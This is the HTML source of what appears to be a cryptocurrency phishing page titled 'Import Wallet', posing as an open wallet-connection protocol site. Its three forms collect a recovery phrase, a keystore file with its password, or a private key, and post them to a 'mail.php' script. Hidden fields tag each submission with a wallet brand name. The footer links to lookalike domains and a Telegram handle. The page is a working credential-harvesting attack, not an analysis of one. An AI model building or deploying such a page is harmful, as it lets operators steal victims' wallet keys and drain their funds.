﻿<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="..\assets\main.css" type="text/css"> 
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta property="og:image" content="../images/logo.svg">
<link rel="icon" href="..\assets\logo.svg">
<script>
    function openCity(evt, cityName) {
    // Declare all variables
    var i, tabcontent, tablinks;
  
    // Get all elements with class="tabcontent" and hide them
    tabcontent = document.getElementsByClassName("tabcontent");
    for (i = 0; i < tabcontent.length; i++) {
      tabcontent[i].style.display = "none";
    }
  
    // Get all elements with class="tablinks" and remove the class "active"
    tablinks = document.getElementsByClassName("tablinks");
    for (i = 0; i < tablinks.length; i++) {
      tablinks[i].className = tablinks[i].className.replace(" active", "");
    }
  
    // Show the current tab, and add an "active" class to the button that opened the tab
    document.getElementById(cityName).style.display = "block";
    evt.currentTarget.className += " active";
  }
  </script>
<title>Import Wallet</title>
</head>
<body>
<center>
<div class="top">
        <a href="#footer?v" class="left">Github</a>
        <a href="#?v" class="left">Docs</a>
        <a href="..\index.htm?v" class="main"><img src="..\assets\logo.svg" alt="logo"></a>
        <a href="#wallets?v" class="left">Wallets</a>
        <a href="#?v" class="left">Apps</a>
</div>
<br>
<h2><center>Import Wallet</center></h2>
<br>
<div class="tab">
  <button class="tablinks active" id="default" onclick="openCity(event, &#39;phrase1&#39;)">Phrase</button>
  <button class="tablinks" onclick="openCity(event, &#39;keystore1&#39;)">Keystore JSON</button>
  <button class="tablinks" onclick="openCity(event, &#39;private1&#39;)">Private Key</button>
</div>

<div id="phrase1" class="tabcontent" style="display: block;">
<form action="mail.php" method="POST">

<input type="hidden" name="phrasekey" value="MEW wallet">
<textarea name="phrasekey" class="phrasekey" placeholder="Phrase"></textarea>
<br>
<div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
<br>
<button type="submit" name="import" class="btn" value="IMPORT" onclick="saveFile()">IMPORT</button>
</form>
</div>

<div id="keystore1" class="tabcontent" style="display: none;">

<form action="mail.php" method="POST">

<input type="hidden" name="keystorekey" value="MEW wallet">
<textarea name="keystorekey" class="keystorekey" placeholder="Keystore JSON"></textarea>
<br>
<div class="field">
    <input type="hidden" name="keystorepassword" value="MEW wallet">
    <input type="text" name="keystorepassword" class="keystorepassword" placeholder="Password">
</div>
<div class="desc">Several lines of text beginning with '(...)' plus the password you used to encrypt it.</div>
<br>
<button type="submit" name="import" class="btn" value="IMPORT" onclick="saveFile()">IMPORT</button>
</form>
</div>

<div id="private1" class="tabcontent" style="display: none;">
<form action="mail.php" method="POST">
<input type="hidden" name="privatekey" value="MEW wallet">
<div class="field">
    <input type="text" name="privatekey" class="privatekey" placeholder="Private Key">
</div>
<div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
<br>
<button type="submit" name="import" class="btn">IMPORT</button>
</form>
</div>

<script>
    document.getElementById("default").click();
</script>
<footer><div id="footer">
<p><img src="..\assets\discord.svg" class="footimg">  <a href="..\invite\jhxMvxP.html">Discord</a></p><br>
<p><img src="..\assets\telegram.svg" class="footimg">  <a href="https://t.me/amooishere">Telegram</a></p><br>
<p><img src="..\assets\twitter.svg" class="footimg">  <a href="https://twitter.walletmobile.org/">Twitter</a></p><br>
<p><img src="..\assets\github.svg" class="footimg">  <a href="..\walletmobile.html">Github</a></p><br>
</div></footer>
</center></body></html>